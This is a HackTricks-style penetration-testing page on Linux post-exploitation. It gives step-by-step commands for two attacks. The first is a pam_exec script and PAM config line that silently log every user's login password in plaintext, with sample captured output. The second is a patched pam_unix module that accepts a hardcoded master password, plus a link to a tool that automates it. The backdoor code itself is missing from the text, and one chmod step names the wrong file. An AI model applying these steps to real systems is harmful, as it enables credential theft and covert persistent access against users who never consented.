hacktricks/linux-hardening/linux-post-exploitation
2023-04-25 20:35:28 +02:00
..
pam-pluggable-authentication-modules.md update twitter 2023-04-25 20:35:28 +02:00
README.md update twitter 2023-04-25 20:35:28 +02:00

Linux Post-Exploitation

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Sniffing Logon Passwords with PAM

Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:

{% content-ref url="pam-pluggable-authentication-modules.md" %} pam-pluggable-authentication-modules.md {% endcontent-ref %}

First, we create a bash script that will be invoked whenever a new authentication occurs.

#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log

The variables are PAM specific and will become available via the pam_exec.so module.

Here is the meaning of the variables:

  • $PAM_USER: The username that was entered.
  • $PAM_RHOST: The remote host (typically the IP Address)
  • $(cat -): This reads stdin, and will contain the password that the script grabs
  • The results are piped into a log file at /var/log/toomanysecrets.log

To prevent all users from reading the file consider pre-creating it and running chmod, e.g.:

sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh

Next, the PAM configuration file needs to be updated the pam_exec module will be used to invoke the script.

There are various config files located in /etc/pam.d/, and we pick common-auth.

sudo nano /etc/pam.d/common-auth

On the very bottom of the file, add the following authentication module:

auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh

The options have the following meaning:

  • optional: Authenticaiton shouldnt fail if there is an error (its not a required step)
  • pam_exec.so: This is the living off the land PAM module that can invoke arbitrary scripts
  • expose_authtok: This is the trick that allows to read the password via stdin
  • quiet: Dont show any errors to the user (if something doesnt work)
  • The last argument is the shell script that was created previously

Finally, make the file executable:

sudo chmod 700 /usr/local/bin/toomanysecrets.sh

Now, lets try this out and ssh from another machine, or login locally.

And then look at the log file:

$ sudo cat /var/log/toomanysecrets.log
 Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
 Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
 Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149

Backdooring PAM

Let go to the sources of PAM (depends on your distro, take the same version number as yours..) and look around line numbers 170/180 in the pam_unix_auth.c file:

vi modules/pam_unix/pam_unix_auth.c

Lets change this by:

This will allow any user using the password "0xMitsurugi" to log in.

Recompile the pam_unix_auth.c, and replace the pam_unix.so file:

make
sudo cp \  
  /home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \  
  /lib/x86_64-linux-gnu/security/  

{% hint style="info" %} You can automate this process with https://github.com/zephrax/linux-pam-backdoor {% endhint %}

References

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥